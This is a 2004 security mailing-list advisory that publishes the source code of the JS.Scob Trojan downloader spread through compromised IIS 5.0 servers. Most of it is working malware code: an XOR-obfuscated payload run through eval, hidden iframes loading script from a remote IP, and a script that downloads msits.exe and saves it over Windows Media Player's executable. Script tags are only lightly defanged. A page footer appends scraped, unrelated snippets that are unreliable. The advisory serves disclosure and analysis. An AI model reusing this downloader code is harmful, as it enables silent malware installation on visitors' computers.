[NEWS] JS.Scob.Trojan Source Code Released

• Previous message: SecuriTeam: "[UNIX] Apache HTTPd Arbitrary Long HTTP Headers DoS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 1 Jul 2004 17:23:14 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  JS.Scob.Trojan Source Code Released
------------------------------------------------------------------------

SUMMARY

The source code for the JS.SCob Trojan downloader is available. By
inspecting the source code of JS.SCob you can see how the malicious
JavaScript downloads the malicious program using an invisible IFRAME in
order to compromise a system. In addition, how it uses the footer featured
of Microsoft's IIS in order to be served to client browsers without
actually modifying any files located in the IIS server. And how it uses a
hidden cookie to periodically attempt connection to the remote site that
contains the malware.

DETAILS

Vulnerable Systems:
 * IIS version 5.0

Note: All SCRIPT tags in the code have been replaced with harmless tags
for security reasons.

The order of script redirection is as follows:
Compromised -(redirect)-> http://217.107.218.***/dot.php -(redirect)->
new.htm -(execute)-> md.htm & shellscr!pt_loader.js -(execute)->
shellscr!pt.js -(install)-> msits.exe

The code for the relevant parts is shown below:
--------------------------------- Begin Code: new.htm
---------------------------------
<scr!pt language="Javascr!pt">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-
10000\;dialogHeight:1\;dialogWidth:1\;").location="javascr!pt'<SCR!PT
SRC=\\'http://217.107.218.***/shellscr!pt_loader.js\\'><\/scr!pt>'";
}</scr!pt>
<scr!pt
language="javascr!pt">setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100
);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=0
HEIGHT=0></IFRAME>');</scr!pt>
<scr!pt>
x=34;
es="84;66;86;5;73;119;71;89;95;91;12;16;14;88;89;95;86;92;67;27;85;69;9
3;88;78;94;108;82;78;74;48;105;107;120;73;79;48;38;58;105;37;9;35;41;55
;111;109;113;61;3;59;37;35;39;118;61;53;56;41;48;59;49;20;79;0;12;0;28;
93;106;98;6;40;4;8;20;64;28;4;8;30;22;90;23;23;20;19;30;8;20;9;19;26;60
;239;237;237;241;164;184;166;165;255;225;227;255;233;175;181;130;154;25
4;208;252;240;236;184;228;236;224;246;254;178;255;241;237;196;196;208;1
31;153;133;132;208;192;192;222;206;140;156;222;215;146;138;191;185;219;
247;217;211;193;151;211;213;210;216;204;247;148;140;142;254;227;249;169
;165;162;172;169;191;236;169;175;187;177;236;242;241;153;134;251;158;14
0;138;224;182;180;169;179;179;218;135;139;143;129;223;201;200;171;211;1
82;183;161;172;167;161;222;188;186;167;213;157;130;131;136;195;213;212;
206;204;201;209;305;305;309;301;310;308;318;297;313;317;317;292;291;352
;367;358;382;319;369;379;377;303;300;312;373;376;371;373;306;373;362;37
0;258;257;342;346;340;320;283;261;348;332;338;351;259;341;259;348;339;3
23;347;323;320;345;339;323;282;263;262;276;339;351;340;346;291;309;380;
356;383;328;332;296;280;294;314;318;316;355;317;295;319;294;378;358;356
;357;358;379;376;364;362;363;364;369;382;366;332;321;339;335;324;257;26
5;260;285;260;271;261;280;323;268;256;276;264;347;328;";
var ds=new String(); ads=es.split(";"); k=ads.length-1;
for(var j=0;j<k;j++)
{e=ads[j];d=e^x;x+=1;ds=ds+String.fromCharCode(d);}eval(ds)
</scr!pt>
---------------------------------- End Code: new.htm
----------------------------------

--------------------------------- Begin Code: shellscr!pt_loader.js
---------------------------------
function getRealShell() {
    myiframe.document.write("<SCR!PT
SRC='http://217.107.218.****/shellscr!pt.js'><\/SCR!PT>");
} document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=0
HEIGHT=0></IFRAME>"); setTimeout("getRealShell()",100);
---------------------------------- End Code: shellscr!pt_loader.js
----------------------------------

--------------------------------- Begin Code: shellscr!pt.js
---------------------------------
var szExt = unescape("%2E%65%78%65");
var szM = unescape("%6D");
var szMMS = szM + szM + "s://";
var szSTR= unescape("%53%74%72%65%61%6D");
var szADO = unescape("%41%44%4F%44%42%2E") + szSTR;
var szMS = "Microsoft"; var szWIN = unescape("%57%69%6E%64%6F%77%73");
var szHTTP = szMS + unescape("%2E%58%4D%4C%48%54%54%50");
var HTTP = new ActiveXObject(szHTTP); var METHOD =
unescape("%47%45%54");
var xx1=unescape("%4D%65%64%69%61"); var xx2 =
unescape("%50%6C%61%79%65%72");
var MP1=unescape("%43%3A%5C%5C%50%72%6F%67%72%61%6D"); var MP2 = " " + xx1
+ " " + xx2;
var szPL = "pl";
var MP = MP1 + " Files\\" + szWIN + MP2 + "\\wm" + szPL +
unescape("%61%79%65%72") + szExt;
var szURL = "http://217.107.218.***/msits.exe";
var i = 8 - 5;
var t = 7 - 6; HTTP.Open(METHOD, szURL, i-3); HTTP.Send();
var ADO = new ActiveXObject(szADO);
ADO.Mode = i; ADO.Type = t;
ADO.Open(); ADO.Write(HTTP.responseBody);
ADO.SaveToFile(MP, i-t); location.href=szMMS;
---------------------------------- End Code: shellscr!pt.js
----------------------------------

--------------------------------- Begin Code: md.htm
---------------------------------
<SCR!PT language="javascr!pt">
window.returnValue = window.dialogArguments;
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close
();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCR!PT>
---------------------------------- End Code: md.htm
----------------------------------

ADDITIONAL INFORMATION

The information has been provided by <mailto:Special-Alerts@k-otik.com>
K-OTiK Security.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Apache HTTPd Arbitrary Long HTTP Headers DoS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [NT] Vulnerable Cached Objects in IE (9 advisories in 1) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... However, each of them is a separate vulnerability, which uses a unique ... Each item in the list below consists of three parts, "Cache" shows how to ... Cache: var fVuln=oWin.showModalDialog; ... (Securiteam) [NT] Mozilla Firefox Window Spoofing (Firespoofing) ... Get your security news from a reliable source. ... The PoC is designed for Firefox 1.0 running in a maximized window. ... var pHeight = 225 ... Pellentesque lectus dui, porttitor sit amet, varius aliquam, ... (Securiteam) Re: Creating mdb file! ... procedure TForm1.CreateDatabase(dbname: string); ... db: variant; ... ';Persist Security Info=False'); ... (borland.public.delphi.database.ado) Re: we reach them, then we twice inject Ronald and Rasuls basic norm ... it was the only non-Salomon source code. ... the results of keyword monitoring were stunning. ... If you look up computer security literature and read up on security incidents, ... (sci.crypt) Re: In order to cross platform, Ruby is designed to be interpreted in runtime, so Ruby code is expo ... Ruby injection is likely easier and more powerful ... If I'm able to read source code in a, hopefully, protected directory, ... There's security, ... Phillip Gawlowski ... (comp.lang.ruby)